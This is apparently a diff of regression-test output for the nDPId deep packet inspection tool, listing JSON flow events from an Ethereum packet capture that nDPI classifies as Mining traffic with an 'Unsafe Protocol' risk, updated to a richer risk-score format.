-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00661{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Mining.Azure","breed":"Acceptable","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Mining"}}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
